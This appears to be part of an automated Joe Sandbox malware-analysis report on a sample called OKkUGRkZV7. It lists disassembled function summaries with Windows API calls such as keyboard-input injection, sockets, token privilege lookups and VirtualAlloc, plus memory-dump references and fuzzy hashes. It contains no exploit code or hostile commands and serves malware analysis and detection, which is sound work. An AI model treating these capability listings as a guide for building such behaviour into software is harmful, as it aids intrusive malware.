                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79dcbc3c6dd72c7ab63ad74daa02b6b7cc95124651c2466eaf38570a327cf966
                                              • Instruction ID: f5608ae0a8132cbba4c3b146b08cb743de800313a5e1083e94e262625f31bd04
                                              • Opcode Fuzzy Hash: 79dcbc3c6dd72c7ab63ad74daa02b6b7cc95124651c2466eaf38570a327cf966
                                              • Instruction Fuzzy Hash: 5CC18F74A14216EFCF15CFA5C884EAEBBB9FF48704B158598E805EB291D730ED81DB90
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 003BE0BE
                                              • CharLowerBuffW.USER32(?,?), ref: 003BE101
                                                • Part of subcall function 003BD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003BD7C5
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 003BE301
                                              • _memmove.LIBCMT ref: 003BE314
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: 335ac58b7abc15c08d6f7f0d5a0538c3365f61134e4b6d29553906511ac56d63
                                              • Instruction ID: 28037a5debc48757bfd3caabb34ab3677c0c1caf8d8a7f5490259d0a735892c6
                                              • Opcode Fuzzy Hash: 335ac58b7abc15c08d6f7f0d5a0538c3365f61134e4b6d29553906511ac56d63
                                              • Instruction Fuzzy Hash: 18C18A756043018FC706DF28C480AAABBE4FF89718F14896EF999DB751D731E946CB81
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 003B80C3
                                              • CoUninitialize.OLE32 ref: 003B80CE
                                                • Part of subcall function 0039D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039D5D4
                                              • VariantInit.OLEAUT32(?), ref: 003B80D9
                                              • VariantClear.OLEAUT32(?), ref: 003B83AA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
                                              • Opcode ID: 27391ac7e7d18538839fab8c996123e96e75b840b8bbfa96537e42a23684c03c
                                              • Instruction ID: 7242b5c63156a5ced368d34e3ef9314b0c4ae2419f8548ddb1c8a3b16d7b30c6
                                              • Opcode Fuzzy Hash: 27391ac7e7d18538839fab8c996123e96e75b840b8bbfa96537e42a23684c03c
                                              • Instruction Fuzzy Hash: B4A114796047019FCB12DF18C481B6AB7E8BF89758F044859FA9A9B7A1CB30FD05CB42
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Variant$AllocClearCopyInitString
                                              • String ID:
                                              • API String ID: 2808897238-0
                                              • Opcode ID: 02a471bc7138667961353942b6499366c9314a85bb25767908ce7091fa981464
                                              • Instruction ID: 24dd4f2827c7bbea7b8a95806fa4a0c5a432223b06d5bfeccbc660fb00c2e124
                                              • Opcode Fuzzy Hash: 02a471bc7138667961353942b6499366c9314a85bb25767908ce7091fa981464
                                              • Instruction Fuzzy Hash: 1B519FB46053429EDF26AF65D893A2EB3E9AF45310F20D81FE596DF691DB70DC408701
                                              APIs
                                                • Part of subcall function 00344EE5: _fseek.LIBCMT ref: 00344EFD
                                                • Part of subcall function 003A9734: _wcscmp.LIBCMT ref: 003A9824
                                                • Part of subcall function 003A9734: _wcscmp.LIBCMT ref: 003A9837
                                              • _free.LIBCMT ref: 003A96A2
                                              • _free.LIBCMT ref: 003A96A9
                                              • _free.LIBCMT ref: 003A9714
                                                • Part of subcall function 00362D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00369A24), ref: 00362D69
                                                • Part of subcall function 00362D55: GetLastError.KERNEL32(00000000,?,00369A24), ref: 00362D7B
                                              • _free.LIBCMT ref: 003A971C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID:
                                              • API String ID: 1552873950-0
                                              • Opcode ID: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
                                              • Instruction ID: 8b9e6cdc09a13df20e59730b8a578242d044ba17cbe27736caa3a7a45e06bd59
                                              • Opcode Fuzzy Hash: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
                                              • Instruction Fuzzy Hash: 255141B1D14258AFDF259F64CC81B9EBBB9EF49300F1044AEF509AB251DB715A80CF58
                                              APIs
                                              • GetWindowRect.USER32(0160E4E0,?), ref: 003C9863
                                              • ScreenToClient.USER32(00000002,00000002), ref: 003C9896
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003C9903
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: 23e21837df05d16f4f54a16cadc8685f1f84f4ee7e062d62d3f4071ecc8e74ae
                                              • Instruction ID: d1ff54d14d87b40e3bcbafc4b6a1be5622d64f998fcda07d35be112822aa8590
                                              • Opcode Fuzzy Hash: 23e21837df05d16f4f54a16cadc8685f1f84f4ee7e062d62d3f4071ecc8e74ae
                                              • Instruction Fuzzy Hash: 90513C35A00208AFDF11DF14C988FAE7BB6EB45360F12816EF855EB2A0D731AD51CB90
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00399AD2
                                              • __itow.LIBCMT ref: 00399B03
                                                • Part of subcall function 00399D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00399DBE
                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00399B6C
                                              • __itow.LIBCMT ref: 00399BC3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow
                                              • String ID:
                                              • API String ID: 3379773720-0
                                              • Opcode ID: b52bd9cf0c062f2f563e662bfc3b819a9893dd7a698a0f71633ec1c26e660cdf
                                              • Instruction ID: 712ee08d2a45e1e9a8bf36ad046105ea34807776624b4e73d52a27043ce5031c
                                              • Opcode Fuzzy Hash: b52bd9cf0c062f2f563e662bfc3b819a9893dd7a698a0f71633ec1c26e660cdf
                                              • Instruction Fuzzy Hash: 1C414275A00209ABDF16DF58D845BEE7BF9EF44710F00005AF905AB291DB74AD44CBA1
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 003B69D1
                                              • WSAGetLastError.WSOCK32(00000000), ref: 003B69E1
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003B6A45
                                              • WSAGetLastError.WSOCK32(00000000), ref: 003B6A51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorLast$__itow__swprintfsocket
                                              • String ID:
                                              • API String ID: 2214342067-0
                                              • Opcode ID: b31d73defebea35515a6ed3ec4449a466a705f8a9b6e88a728db87cd7fdda166
                                              • Instruction ID: bef1fdbfefc541ee550e1303bab2e74d0bc79f6c9943ad00b7266fae182ecc02
                                              • Opcode Fuzzy Hash: b31d73defebea35515a6ed3ec4449a466a705f8a9b6e88a728db87cd7fdda166
                                              • Instruction Fuzzy Hash: CC4181757402006FEB62AF28CC87F6A77E99F05B14F048419FA59AF2D3DA75AD008791
                                              APIs
                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003CF910), ref: 003B64A7
                                              • _strlen.LIBCMT ref: 003B64D9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID:
                                              • API String ID: 4218353326-0
                                              • Opcode ID: efe8485d5fde338d126681be8542db7bb61bcbac32c0fcbd110704aee140b449
                                              • Instruction ID: 61291daa4f25d835a6803420a49ed5abdc7d832a692dfa95ab2f2d4c8f5c5a8f
                                              • Opcode Fuzzy Hash: efe8485d5fde338d126681be8542db7bb61bcbac32c0fcbd110704aee140b449
                                              • Instruction Fuzzy Hash: F541A231A00104ABCB26EBA4DC96FEEB7A9AF45314F108156F9159F693DB34AD10CB50
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003AB89E
                                              • GetLastError.KERNEL32(?,00000000), ref: 003AB8C4
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003AB8E9
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003AB915
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: a39e4c7ec2f976bb8818e918a88bb4c1ab569fd1dc1a93b6e4a17948fe456eb4
                                              • Instruction ID: 1e4103a8518df4550255ae826f7751b3aedd3528d3c37ea0dea5bc02fcbcf3e1
                                              • Opcode Fuzzy Hash: a39e4c7ec2f976bb8818e918a88bb4c1ab569fd1dc1a93b6e4a17948fe456eb4
                                              • Instruction Fuzzy Hash: 1C411D39600550DFCB22EF19C445A5ABBE5EF8A310F158099ED4A9F362CB35FD01CB91
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C88DE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: 9a201cc266573506ca78aba4ea3b086448ccbb94c0a286f432232aa09222f12d
                                              • Instruction ID: 225eb077ce900852dcdaeb96ffb4104273c478331252c07e69c4a44269104222
                                              • Opcode Fuzzy Hash: 9a201cc266573506ca78aba4ea3b086448ccbb94c0a286f432232aa09222f12d
                                              • Instruction Fuzzy Hash: CE31D434600208AFEB229F58CC45FB977A9EB09310F55452AFA11E76A1CF71EF409B56
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 003CAB60
                                              • GetWindowRect.USER32(?,?), ref: 003CABD6
                                              • PtInRect.USER32(?,?,003CC014), ref: 003CABE6
                                              • MessageBeep.USER32(00000000), ref: 003CAC57
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: 3dc8e1acb05f815682cb3c8c13833921bbc055a2a9b84df0f91011ab6c75d517
                                              • Instruction ID: 0750e255a790f915995ac6ecd9c9ce0bb285925239b5614b11382e76a5f8bc6d
                                              • Opcode Fuzzy Hash: 3dc8e1acb05f815682cb3c8c13833921bbc055a2a9b84df0f91011ab6c75d517
                                              • Instruction Fuzzy Hash: E94149316009199FCB12EF58D884F69BBFAFB49318F19C1A9E815DB260D730AD41CB92
                                              APIs
                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003A0B27
                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 003A0B43
                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003A0BA9
                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003A0BFB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: 67cf02a265650068b4baad37977fb12eb648e2479061cf662491ffd9b022b20e
                                              • Instruction ID: c9bdd38f6f6f6eb581cab52928f7fd32c400f39b2d04f7c3ff13b86c5d028747
                                              • Opcode Fuzzy Hash: 67cf02a265650068b4baad37977fb12eb648e2479061cf662491ffd9b022b20e
                                              • Instruction Fuzzy Hash: D3313A30E40218AEFF3B8B258D09BFABBAAEB47318F04435AE591961D1C375D9409775
                                              APIs
                                              • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 003A0C66
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 003A0C82
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 003A0CE1
                                              • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 003A0D33
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: 1e4fc330342d4e2c71f0cbc6302a27745246bbef7baee6681a3b763521d5aed0
                                              • Instruction ID: cafd62066dd45ab20ca57d8de63e41213300a23ffaee4d1e0b3b79fab764b7a4
                                              • Opcode Fuzzy Hash: 1e4fc330342d4e2c71f0cbc6302a27745246bbef7baee6681a3b763521d5aed0
                                              • Instruction Fuzzy Hash: 473149319402186FFF3B8B658C04BFEBBAAEB47320F04432AE4959A1D1C3399D558752
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003761FB
                                              • __isleadbyte_l.LIBCMT ref: 00376229
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00376257
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0037628D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 415b520b8fc3586b3627d5baa6c926b8506654287a7d09bd609ecefc3a18394d
                                              • Instruction ID: a83b810835cd3f65c9e3a1a6421f37b2d875e41580a74d42bc2e31c356b6c5e0
                                              • Opcode Fuzzy Hash: 415b520b8fc3586b3627d5baa6c926b8506654287a7d09bd609ecefc3a18394d
                                              • Instruction Fuzzy Hash: 3831D431600A45AFDF339F65CC5ABBA7BB9FF41310F168428E81897192D735D950DB50
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 003C4F02
                                                • Part of subcall function 003A3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003A365B
                                                • Part of subcall function 003A3641: GetCurrentThreadId.KERNEL32 ref: 003A3662
                                                • Part of subcall function 003A3641: AttachThreadInput.USER32(00000000,?,003A5005), ref: 003A3669
                                              • GetCaretPos.USER32(?), ref: 003C4F13
                                              • ClientToScreen.USER32(00000000,?), ref: 003C4F4E
                                              • GetForegroundWindow.USER32 ref: 003C4F54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: e5f8dc702ff60a3a5bdf09feab78cd67b1e7c97fb8cd13f6b68a629cf668567b
                                              • Instruction ID: 4ebcbc7e7bb98f010325d767fd9ee7dd31adee3c74b6532620aca75627ba1d6f
                                              • Opcode Fuzzy Hash: e5f8dc702ff60a3a5bdf09feab78cd67b1e7c97fb8cd13f6b68a629cf668567b
                                              • Instruction Fuzzy Hash: FE311C71D00108AFDB01EFA9C985EEFB7FDEF99304F10446AE415EB251DA71AE458BA0
                                              APIs
                                                • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                              • GetCursorPos.USER32(?), ref: 003CC4D2
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0037B9AB,?,?,?,?,?), ref: 003CC4E7
                                              • GetCursorPos.USER32(?), ref: 003CC534
                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0037B9AB,?,?,?), ref: 003CC56E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                              • String ID:
                                              • API String ID: 2864067406-0
                                              • Opcode ID: e49590f4db61f01e5e20169c930182b98e1f68fa9be6e648b35e9037446ca18f
                                              • Instruction ID: c190a3580473d84fac2c0976573ef9de9a9f4d4990937b3ed4f86cc65c6ddc91
                                              • Opcode Fuzzy Hash: e49590f4db61f01e5e20169c930182b98e1f68fa9be6e648b35e9037446ca18f
                                              • Instruction Fuzzy Hash: 89319335510018AFCB169F59C858EAB7BBAEB0A310F454069F909DB2A1CB31AD50DFA4
                                              APIs
                                                • Part of subcall function 0039810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00398121
                                                • Part of subcall function 0039810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0039812B
                                                • Part of subcall function 0039810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0039813A
                                                • Part of subcall function 0039810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00398141
                                                • Part of subcall function 0039810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00398157
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003986A3
                                              • _memcmp.LIBCMT ref: 003986C6
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003986FC
